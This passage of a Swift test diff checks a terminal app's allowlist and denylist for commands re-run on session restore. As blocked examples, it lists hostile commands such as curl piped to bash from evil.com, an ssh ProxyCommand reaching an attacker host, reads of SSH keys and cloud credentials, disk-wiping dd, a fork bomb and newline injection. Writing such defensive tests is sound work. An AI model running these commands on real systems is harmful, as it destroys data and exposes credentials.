+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("/usr/bin/opencode --flag", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("/opt/homebrew/bin/opencode --continue", rawAllowlist: allowlist))
+        // But not if the basename doesn't match
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("/usr/bin/other-tool", rawAllowlist: allowlist))
+    }
+
+    func testExactPatternMatchesAbsolutePathCommands() {
+        // Exact pattern "opencode" should also match "/usr/bin/opencode" via basename
+        let allowlist = "opencode"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("/usr/bin/opencode", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("/opt/homebrew/bin/opencode", rawAllowlist: allowlist))
+        // But not with arguments (exact match)
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("/usr/bin/opencode --flag", rawAllowlist: allowlist))
+    }
+
+    func testMultiWordPrefixPattern() {
+        // Multi-word prefix patterns like "npm run dev *"
+        let allowlist = "npm run dev *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("npm run dev", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("npm run dev --port 3000", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("npm run dev --host 0.0.0.0 --port 3000", rawAllowlist: allowlist))
+        // But not different npm commands
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("npm run build", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("npm run development", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("npm start", rawAllowlist: allowlist))
+    }
+
+    func testPatternWithTrailingWhitespace() {
+        // Patterns with trailing whitespace should still work
+        let allowlist = "opencode *  \n  claude *  "
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode --flag", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("claude --model sonnet", rawAllowlist: allowlist))
+    }
+
+    func testAllowlistPatternIsCaseSensitive() {
+        // Allowlist patterns should be case-sensitive (commands are case-sensitive on Unix)
+        let allowlist = "OpenCode *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("OpenCode --flag", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode --flag", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("OPENCODE --flag", rawAllowlist: allowlist))
+    }
+
+    func testSingleAsteriskPatternDoesNotMatchEverything() {
+        // A pattern of just "*" should NOT be a universal wildcard
+        // It would only match a literal command named "*"
+        let allowlist = "*"
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("npm run dev", rawAllowlist: allowlist))
+        // The pattern "* *" would match commands starting with "*" (not useful)
+        let allowlist2 = "* *"
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist2))
+    }
+
+    func testPrefixPatternRequiresSpaceBeforeAsterisk() {
+        // "opencode*" is NOT a prefix pattern - it's an exact match for "opencode*"
+        let allowlist = "opencode*"
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("opencode --flag", rawAllowlist: allowlist))
+        // Only matches the literal "opencode*"
+        // (This is intentional - we only support " *" suffix for prefix matching)
+    }
+
+    func testPatternMatchingWithSpecialCharactersInCommand() {
+        // Commands with special characters should match correctly
+        let allowlist = "my-app *\nmy_app *\nmy.app *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("my-app --flag", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("my_app --flag", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("my.app --flag", rawAllowlist: allowlist))
+    }
+
+    func testPatternMatchingPreservesArgumentSpaces() {
+        // Arguments with multiple spaces should be preserved
+        let allowlist = "echo *"
+        // Note: echo is blocked by denylist in some contexts, use a safe command
+        let safeAllowlist = "myecho *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("myecho hello world", rawAllowlist: safeAllowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("myecho 'hello   world'", rawAllowlist: safeAllowlist))
+    }
+
+    // MARK: - Allowlist Normalization Tests
+
+    func testNormalizedPatternsWithEmptyInputReturnsDefaults() {
+        let patterns = SessionRestoreCommandSettings.normalizedAllowlistPatterns(rawValue: nil)
+        XCTAssertFalse(patterns.isEmpty)
+        XCTAssertTrue(patterns.contains("opencode *"))
+    }
+
+    func testNormalizedPatternsWithWhitespaceOnlyReturnsEmpty() {
+        // If user explicitly clears the allowlist, return empty to disable all restores
+        let patterns = SessionRestoreCommandSettings.normalizedAllowlistPatterns(rawValue: "   \n\n   ")
+        XCTAssertTrue(patterns.isEmpty)
+    }
+
+    func testNormalizedPatternsFiltersCommentsAndBlanks() {
+        let patterns = SessionRestoreCommandSettings.normalizedAllowlistPatterns(rawValue: """
+        # comment
+        opencode
+
+        claude *
+        """)
+        XCTAssertEqual(patterns, ["opencode", "claude *"])
+    }
+
+    // MARK: - Default Allowlist Tests
+
+    func testDefaultAllowlistIncludesCodingAgents() {
+        let patterns = SessionRestoreCommandSettings.defaultAllowlistPatterns
+        XCTAssertTrue(patterns.contains("opencode *"))
+        XCTAssertTrue(patterns.contains("claude *"))
+        XCTAssertTrue(patterns.contains("aider *"))
+    }
+
+    func testDefaultAllowlistIncludesDevServers() {
+        let patterns = SessionRestoreCommandSettings.defaultAllowlistPatterns
+        XCTAssertTrue(patterns.contains("npm run dev *"))
+        XCTAssertTrue(patterns.contains("bun dev *"))
+        XCTAssertTrue(patterns.contains("cargo run *"))
+    }
+
+    func testDefaultAllowlistExcludesDestructiveCommands() {
+        // Verify dangerous commands are NOT in the default allowlist
+        let patterns = SessionRestoreCommandSettings.defaultAllowlistPatterns
+        XCTAssertFalse(patterns.contains("rm"))
+        XCTAssertFalse(patterns.contains("rm *"))
+        XCTAssertFalse(patterns.contains("sudo *"))
+        XCTAssertFalse(patterns.contains("git push"))
+    }
+
+    func testDefaultAllowlistDoesNotMatchDestructiveCommands() {
+        // Verify destructive commands don't match any default patterns
+        let defaultRaw = SessionRestoreCommandSettings.defaultAllowlistPatterns.joined(separator: "\n")
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("rm -rf /", rawAllowlist: defaultRaw))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("sudo rm -rf /", rawAllowlist: defaultRaw))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("git push --force", rawAllowlist: defaultRaw))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("dd if=/dev/zero of=/dev/sda", rawAllowlist: defaultRaw))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("chmod -R 777 /", rawAllowlist: defaultRaw))
+        // Also verify that watch (now removed) doesn't enable bypasses
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("watch rm -rf /tmp", rawAllowlist: defaultRaw))
+    }
+
+    // MARK: - Hardcoded Denylist Tests
+
+    /// Helper to assert all commands in a list are blocked by the denylist
+    private func assertAllBlocked(_ commands: [String], allowlist: String, file: StaticString = #file, line: UInt = #line) {
+        for command in commands {
+            XCTAssertFalse(
+                SessionRestoreCommandSettings.isCommandAllowed(command, rawAllowlist: allowlist),
+                "Expected '\(command)' to be blocked by denylist",
+                file: file,
+                line: line
+            )
+        }
+    }
+
+    func testDenylistBlocksDestructiveCommandsEvenIfInAllowlist() {
+        // Even if user adds dangerous commands to allowlist, denylist should block them
+        let dangerousAllowlist = "rm *\nsudo *\ndd *\nchmod *\ngit push --force *"
+        assertAllBlocked([
+            "rm -rf /",
+            "sudo apt-get install",
+            "dd if=/dev/zero of=/dev/sda",
+            "chmod 777 /etc/passwd",
+            "git push --force origin main",
+        ], allowlist: dangerousAllowlist)
+    }
+
+    func testDenylistTakesPrecedenceOverAllowlist() {
+        // Verify the security model: denylist is checked FIRST, allowlist SECOND
+        // A command must pass denylist AND match allowlist to be allowed
+
+        // Case 1: Command matches allowlist but is blocked by denylist -> BLOCKED
+        let allowlist = "opencode *\ncurl *\nsudo *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode --continue", rawAllowlist: allowlist),
+                      "Safe allowlisted command should be allowed")
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("curl http://example.com", rawAllowlist: allowlist),
+                       "curl is in denylist (dangerous executable) even though allowlisted")
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("sudo echo hello", rawAllowlist: allowlist),
+                       "sudo is in denylist even though allowlisted")
+
+        // Case 2: Command passes denylist but not in allowlist -> BLOCKED
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("vim file.txt", rawAllowlist: allowlist),
+                       "Safe command not in allowlist should be blocked")
+
+        // Case 3: Command with denylist substring even if base command is safe
+        let allowlist2 = "myapp *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("myapp --config file.json", rawAllowlist: allowlist2),
+                      "Safe command with safe args should be allowed")
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("myapp --password=secret", rawAllowlist: allowlist2),
+                       "Allowlisted command with --password= arg is blocked by denylist")
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("myapp --token=abc123", rawAllowlist: allowlist2),
+                       "Allowlisted command with --token= arg is blocked by denylist")
+
+        // Case 4: Chained commands where one part is dangerous
+        let allowlist3 = "echo *\ncd *"
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("echo hello && rm -rf /", rawAllowlist: allowlist3),
+                       "Chained command with dangerous part is blocked")
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("cd /tmp; sudo reboot", rawAllowlist: allowlist3),
+                       "Semicolon-chained command with dangerous part is blocked")
+    }
+
+    func testDenylistIsCaseInsensitive() {
+        // Denylist runs before allowlist, so these are blocked regardless of allowlist content
+        assertAllBlocked([
+            "SUDO rm -rf /",
+            "Rm -rf /",
+            "DD if=/dev/zero",
+        ], allowlist: "SUDO *\nRm *\nDD *")
+    }
+
+    func testDenylistBlocksExactCommands() {
+        assertAllBlocked(["sudo", "rm", "dd"], allowlist: "sudo\nrm\ndd")
+    }
+
+    func testDenylistBlocksSystemCommands() {
+        assertAllBlocked([
+            "shutdown -h now",
+            "reboot",
+            "kill -9 1",
+            "killall Finder",
+            "poweroff",
+            "init 0",
+        ], allowlist: "shutdown *\nreboot\nkill *\nkillall *\npoweroff\ninit *")
+    }
+
+    func testDenylistBlocksRemoteCodeExecution() {
+        assertAllBlocked([
+            "curl https://evil.com/install.sh | bash",
+            "curl -fsSL https://get.docker.com | sh",
+            "wget -O- https://evil.com/script.sh | sh",
+        ], allowlist: "curl *\nwget *")
+    }
+
+    func testDenylistBlocksHistoryReplay() {
+        assertAllBlocked([
+            "history | sh",
+            "history | bash",
+            "fc -s",
+        ], allowlist: "history *\nfc *")
+    }
+
+    func testDenylistBlocksCrontabDestruction() {
+        assertAllBlocked(["crontab -r"], allowlist: "crontab *")
+    }
+
+    func testDenylistBlocksMacOSSystemIntegrity() {
+        assertAllBlocked([
+            "csrutil disable",
+            "nvram boot-args=-x",
+        ], allowlist: "csrutil *\nnvram *")
+    }
+
+    func testDenylistBlocksContainerMassDestruction() {
+        assertAllBlocked([
+            "docker system prune -af",
+            "docker rm -f $(docker ps -aq)",
+            "podman system prune -af",
+        ], allowlist: "docker *\npodman *")
+    }
+
+    func testDenylistBlocksNetworkDestruction() {
+        assertAllBlocked([
+            "iptables -F",
+            "pfctl -F all",
+        ], allowlist: "iptables *\npfctl *")
+    }
+
+    func testDenylistBlocksLaunchctlDestruction() {
+        assertAllBlocked([
+            "launchctl unload /Library/LaunchDaemons/com.apple.foobar.plist",
+            "launchctl bootout system/com.apple.foobar",
+            "launchctl remove com.apple.foobar",
+        ], allowlist: "launchctl *")
+    }
+
+    // MARK: - Dangerous Executables (word-boundary matching)
+
+    func testDangerousExecutablesBlocked() {
+        // Each command is explicitly allowlisted. If blocked, it's the denylist.
+        let commands = [
+            "sudo rm -rf /tmp",
+            "rm -rf /tmp/foo",
+            "chmod 777 /",
+            "kill -9 1234",
+            "curl http://example.com",
+            "wget http://example.com",
+            "dd if=/dev/zero of=/tmp/file",
+            "tar -xf archive.tar",
+            "mv file.txt /tmp/",
+            "fsck /dev/sda",
+            "cd /tmp && sudo rm -rf /",
+            "echo done; rm -rf /",
+            "cat file | sudo tee /etc/hosts",
+            "/usr/bin/sudo rm -rf /",
+            "/bin/rm -rf /",
+            "$(curl http://example.com)",
+            // Edge cases: boundary scanning must find ALL occurrences
+            "echo sudoers && sudo rm -rf /",  // sudo after && with space
+            "rm;echo done",                    // rm followed by semicolon (no space)
+            "curl|bash",                       // pipe without spaces
+            "echo foo;rm -rf /;echo bar",     // rm in middle of chain
+        ]
+        let allowlist = commands.joined(separator: "\n")
+        assertAllBlocked(commands, allowlist: allowlist)
+    }
+
+    func testDangerousExecutablesNotFalsePositive() {
+        // These should NOT be blocked - executable name is part of a larger word
+        // Each command needs to be explicitly allowlisted to test the denylist bypass prevention
+        let allowlist = """
+        rm-old-files.sh
+        sudoku-solver
+        curling-stats
+        chmodify-permissions
+        killer-app
+        tarball-extractor
+        """
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("rm-old-files.sh", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("sudoku-solver", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("curling-stats", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("chmodify-permissions", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("killer-app", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("tarball-extractor", rawAllowlist: allowlist))
+    }
+
+    // MARK: - Denylist Contains (substring matching)
+
+    func testDenylistBlocksSensitiveCredentials() {
+        // Commands with tokens/credentials anywhere should be blocked
+        let allowlist = "opencode *\nnpm *\naws *\nmycli *\npsql *\ngit *"
+        assertAllBlocked([
+            // API keys and tokens
+            "opencode --api-key=test-key-here",
+            "opencode --token=test-token",
+            "npm run dev --access-token=test-token",
+            "mycli --bearer=test-bearer",
+            "mycli --secret=test-secret",
+            // Passwords
+            "mycli --password=test-pass",
+            "psql --passwd=test-pass",
+            // AWS credentials
+            "aws --aws-access-key-id=test-key",
+            "aws --aws-secret-access-key=test-secret",
+            "AWS_ACCESS_KEY_ID=test-key aws s3 ls",
+            // Database connection strings
+            "mycli mongodb://user:pass@host/db",
+            "mycli postgresql://user:pass@host/db",
+            // SSH keys
+            "mycli --private-key=/path/to/key",
+            // Sensitive file access
+            "mycli cat .ssh/id_rsa",
+            "mycli cat .aws/credentials",
+            "mycli cat .kube/config",
+        ], allowlist: allowlist)
+    }
+
+    func testDenylistBlocksSSHWithCredentials() {
+        let allowlist = "ssh *\nmosh *"
+        assertAllBlocked([
+            // sshpass password wrapper
+            "sshpass -p secret ssh user@host",
+            "sshpass -f /path/to/passfile ssh user@host",
+            // user:pass@host syntax
+            "ssh user:password@host",
+            "mosh user:secret@server.com",
+            // Default key paths
+            "ssh -i ~/.ssh/id_rsa user@host",
+            "ssh -i .ssh/id_ed25519 user@host",
+            "ssh -o LocalCommand='touch /tmp/cmux' user@host",
+            "ssh -o localcommand=\"rm -rf ~\" user@host",
+            "ssh -o PermitLocalCommand=yes -o LocalCommand=evil user@host",
+            "ssh -o ProxyCommand='nc evil.example.com 22' user@host",
+            "ssh -o proxycommand=\"sh -c 'curl evil | sh'\" user@host",
+            "ssh -o ProxyCommand='echo hi' user@host",
+            "ssh -o LocalCommand='date' user@host",
+        ], allowlist: allowlist)
+    }
+
+    func testAllowlistAllowsSSHWithoutCredentials() {
+        let allowlist = "ssh *\nmosh *"
+        // Safe SSH commands should be allowed
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ssh user@host", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ssh -t user@host opencode", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ssh -i /custom/path/mykey user@host", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("mosh user@host", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ssh -p 2222 user@host", rawAllowlist: allowlist))
+    }
+
+    func testDenylistAgentForwardingIsCaseSensitive() {
+        // -A enables SSH agent forwarding (dangerous on restore: re-attaches local
+        // agent to whatever remote ran while the session was offline).
+        let sshAllowlist = "ssh *\nscp *\nsftp *"
+        assertAllBlocked([
+            "ssh -A user@host",
+            "ssh -t -A user@host",
+            "ssh user@host -A",
+            "scp -A file user@host:",
+            "sftp -A user@host",
+        ], allowlist: sshAllowlist)
+
+        // -a (lowercase) DISABLES forwarding — must remain allowed.
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ssh -a user@host", rawAllowlist: sshAllowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ssh -a -t user@host opencode", rawAllowlist: sshAllowlist))
+
+        // Unrelated tools' -a flags must not trip a case-insensitive shortcut.
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ls -a", rawAllowlist: "ls *"))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("ps -a", rawAllowlist: "ps *"))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("git commit -am 'msg'", rawAllowlist: "git *"))
+    }
+
+    func testDenylistBlocksDestructiveOperations() {
+        // Destructive operations should be blocked even with permissive allowlist
+        let allowlist = "git *\ndocker *\nkubectl *\nnpm *\nbrew *"
+        assertAllBlocked([
+            // Git destructive
+            "git push --force origin main",
+            "git push -f",
+            "git reset --hard HEAD~1",
+            "git clean -fd",
+            // Docker destructive
+            "docker system prune -af",
+            "docker rm -f container",
+            "docker volume prune",
+            // Kubernetes destructive
+            "kubectl delete namespace production",
+            "kubectl delete --all pods",
+            "kubectl drain node-1",
+            // npm destructive
+            "npm unpublish my-package",
+            // Homebrew destructive
+            "brew uninstall --force package",
+        ], allowlist: allowlist)
+    }
+
+    func testDenylistBlocksPipedShellExecution() {
+        let allowlist = "echo *\ncat *"
+        assertAllBlocked([
+            "echo 'malicious' | sh",
+            "cat script.sh | bash",
+            "echo 'test' | /bin/sh",
+            "history | bash",
+        ], allowlist: allowlist)
+    }
+
+    func testDenylistAllowsSafeCommands() {
+        let allowlist = "opencode *\nnpm *\ngit *\ndocker *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("opencode --continue", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("npm run dev", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("git status", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("git push origin main", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("docker ps", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("docker logs container", rawAllowlist: allowlist))
+    }
+
+    // MARK: - MySQL Password Detection Tests
+
+    func testDenylistBlocksMySQLWithPasswordFlag() {
+        // MySQL-family tools use -p for password (unlike cargo/flask/npm which use it for port/package)
+        let allowlist = "mysql *\nmariadb *\nmysqldump *\nmysqladmin *"
+        assertAllBlocked([
+            "mysql -u root -p database",
+            "mysql -pMyPassword database",
+            "mysql -u admin -p=secret",
+            "mariadb -p database",
+            "mysqldump -u root -p database > backup.sql",
+            "mysqladmin -p status",
+            "/usr/bin/mysql -u root -p",
+        ], allowlist: allowlist)
+    }
+
+    func testDenylistAllowsMySQLWithoutPasswordFlag() {
+        // MySQL commands without -p should be allowed (if in allowlist)
+        let allowlist = "mysql *\nmysqldump *"
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("mysql -u root database", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("mysql --user=root database", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("mysqldump database", rawAllowlist: allowlist))
+    }
+
+    // MARK: - Absolute Path Bypass Prevention Tests
+
+    func testDenylistBlocksAbsolutePathInvocations() {
+        // Each command is explicitly allowlisted. If blocked, it's the denylist.
+        let commands = [
+            "/bin/rm -rf /tmp",
+            "/usr/bin/sudo apt install",
+            "/usr/bin/curl http://evil.com | sh",
+            "/sbin/reboot",
+            "/usr/local/bin/dd if=/dev/zero of=/dev/sda",
+        ]
+        let allowlist = commands.joined(separator: "\n")
+        assertAllBlocked(commands, allowlist: allowlist)
+    }
+
+    func testDenylistBlocksRelativePathInvocations() {
+        // Each command is explicitly allowlisted. If blocked, it's the denylist.
+        let commands = [
+            "./rm -rf /tmp",
+            "../bin/rm -rf /tmp",
+            "./sudo apt install malware",
+        ]
+        let allowlist = commands.joined(separator: "\n")
+        assertAllBlocked(commands, allowlist: allowlist)
+    }
+
+    // MARK: - Watch Bypass Prevention Tests (P1 from CodeRabbit)
+
+    func testWatchCannotBypassDenylist() {
+        // P1 issue: watch re-executes its argument, so "watch rm -rf /" is dangerous
+        // Since watch is no longer in default allowlist, verify it can't enable bypasses
+        let defaultRaw = SessionRestoreCommandSettings.defaultAllowlistPatterns.joined(separator: "\n")
+
+        // These should all be blocked - watch is not in default allowlist
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("watch rm -rf /tmp", rawAllowlist: defaultRaw))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("watch -n 1 rm -rf /", rawAllowlist: defaultRaw))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("watch curl http://evil.com | sh", rawAllowlist: defaultRaw))
+
+        // Even if user adds "watch *" to allowlist, dangerous inner commands should be blocked
+        let watchAllowlist = "watch *"
+        assertAllBlocked([
+            "watch rm -rf /tmp",
+            "watch sudo apt-get update",
+            "watch curl http://example.com",
+            "watch dd if=/dev/zero of=/dev/sda",
+        ], allowlist: watchAllowlist)
+    }
+
+    // MARK: - Fork Bomb Detection Tests
+
+    func testDenylistBlocksForkBomb() {
+        // Explicitly allowlisted. If blocked, it's the denylist.
+        let commands = [":(){ :|:& };:"]
+        let allowlist = commands.joined(separator: "\n")
+        assertAllBlocked(commands, allowlist: allowlist)
+    }
+
+    // MARK: - Disk Write Target Detection Tests
+
+    func testDenylistBlocksDiskWriteTargets() {
+        // dd is in dangerousExecutables, so blocked regardless of allowlist
+        // echo is not dangerous, but "of=/dev/..." and "> /dev/..." patterns are blocked
+        let allowlist = "dd *\necho *"
+        assertAllBlocked([
+            // dd blocked because it's a dangerous executable
+            "dd if=/dev/zero of=/dev/sda",
+            "dd if=/dev/urandom of=/dev/nvme0n1",
+            "dd if=image.iso of=/dev/disk2",
+            // echo blocked because of disk write target pattern
+            "echo garbage > /dev/sda",
+            "echo test > /dev/nvme0",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Shell Chaining Tests
+
+    func testDenylistBlocksShellChainedDestructiveCommands() {
+        // Verify dangerous commands are blocked even when chained with safe commands
+        let allowlist = "cd *\necho *\nls *\ntest *"
+        assertAllBlocked([
+            // Semicolon chaining
+            "cd /tmp; rm -rf *",
+            "echo done; sudo reboot",
+            // AND chaining
+            "cd /tmp && rm -rf *",
+            "test -f file && rm file",
+            // OR chaining
+            "ls || rm -rf /",
+            // Pipe chaining
+            "ls | xargs rm",
+            // Backtick subshell
+            "echo `rm -rf /`",
+            // $() subshell
+            "echo $(sudo whoami)",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Environment Variable Manipulation Tests
+
+    func testDenylistBlocksEnvironmentManipulation() {
+        let allowlist = "export *\nunset *"
+        assertAllBlocked([
+            "unset PATH",
+            "export PATH=",
+            "export PATH=\"\"",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Database Connection String Tests
+
+    func testDenylistBlocksDatabaseConnectionStrings() {
+        // Connection strings often contain embedded credentials
+        let allowlist = "psql *\nmongo *\nredis-cli *"
+        assertAllBlocked([
+            "psql postgresql://user:password@host/db",
+            "psql postgres://admin:secret@localhost/mydb",
+            "mongo mongodb://user:pass@host:27017/db",
+            "mongo mongodb+srv://user:pass@cluster.mongodb.net/db",
+            "redis-cli redis://user:password@host:6379",
+            "redis-cli rediss://user:password@host:6379",
+            "mycli mysql://root:password@localhost/db",
+            "mycli amqp://user:pass@host/vhost",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Sensitive File Access Tests
+
+    func testDenylistBlocksSensitiveFileAccess() {
+        let allowlist = "cat *\nless *\nview *"
+        assertAllBlocked([
+            "cat /etc/shadow",
+            "cat ~/.ssh/id_rsa",
+            "cat ~/.ssh/id_ed25519",
+            "cat ~/.ssh/authorized_keys",
+            "cat ~/.aws/credentials",
+            "cat ~/.kube/config",
+            "cat ~/.npmrc",
+            "cat ~/.netrc",
+            "cat ~/.git-credentials",
+            "cat ~/.docker/config.json",
+            "less .ssh/id_ecdsa",
+            "view .ssh/id_dsa",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Kubernetes Destructive Operations Tests
+
+    func testDenylistBlocksKubernetesDestructive() {
+        let allowlist = "kubectl *"
+        assertAllBlocked([
+            "kubectl delete namespace production",
+            "kubectl delete ns kube-system",
+            "kubectl delete --all pods",
+            "kubectl drain node-1",
+            "kubectl cordon node-1",
+        ], allowlist: allowlist)
+    }
+
+    // MARK: - Git Checkout Force Tests
+
+    func testDenylistBlocksGitCheckoutForce() {
+        let allowlist = "git *"
+        assertAllBlocked([
+            "git checkout --force main",
+            "git checkout --force .",
+        ], allowlist: allowlist)
+        // Regular checkout should be allowed
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("git checkout main", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("git checkout -b feature", rawAllowlist: allowlist))
+    }
+
+    // MARK: - System Service Tests
+
+    func testDenylistBlocksSystemServiceDestruction() {
+        let allowlist = "systemctl *\nlaunchctl *\nservice *"
+        assertAllBlocked([
+            "systemctl stop nginx",
+            "systemctl disable sshd",
+            "systemctl mask docker",
+            "launchctl unload /Library/LaunchDaemons/com.example.plist",
+            "launchctl bootout system/com.example.service",
+            "service stop nginx",
+        ], allowlist: allowlist)
+        // Safe service commands should be allowed
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("systemctl status nginx", rawAllowlist: allowlist))
+        XCTAssertTrue(SessionRestoreCommandSettings.isCommandAllowed("systemctl start nginx", rawAllowlist: allowlist))
+    }
+
+    // MARK: - Edge Case: Empty and Whitespace Commands
+
+    func testEmptyCommandsNotAllowed() {
+        // Empty commands are rejected before allowlist check (guard in isCommandAllowed).
+        // Use any allowlist - the rejection happens at normalization stage.
+        let allowlist = "npm *"
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("   ", rawAllowlist: allowlist))
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("\n\t", rawAllowlist: allowlist))
+    }
+
+    // MARK: - Validated Restore Command Helper Tests
+
+    func testValidatedRestoreCommandReturnsNilForBlocked() {
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand("rm -rf /"))
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand("sudo reboot"))
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand(nil))
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand(""))
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand("   "))
+    }
+
+    func testValidatedRestoreCommandTrimsWhitespace() {
+        // Default allowlist includes "opencode *"
+        let result = SessionRestoreCommandSettings.validatedRestoreCommand("  opencode --continue  ")
+        XCTAssertEqual(result, "opencode --continue")
+    }
+
+    func testValidatedRestoreCommandReturnsNilForNonAllowlisted() {
+        // random-unknown-command is not in default allowlist
+        XCTAssertNil(SessionRestoreCommandSettings.validatedRestoreCommand("random-unknown-command"))
+    }
+
+    // MARK: - Command Injection Prevention Tests
+
+    func testCommandsWithNewlinesAreBlocked() {
+        // Newlines in commands could enable injection attacks (e.g., "ssh host\nrm -rf ~")
+        // The denylist should block commands containing newlines via piped shell patterns
+        let allowlist = "ssh *\nopencode *"
+
+        // Commands with literal newlines should be blocked by "| sh" / "| bash" patterns
+        // or caught at the initialInput validation layer (GhosttyTerminalView)
+        XCTAssertFalse(SessionRestoreCommandSettings.isCommandAllowed("ssh host\nrm -rf ~", rawAllowlist: allowlist),
+                       "Command with embedded newline should be blocked")
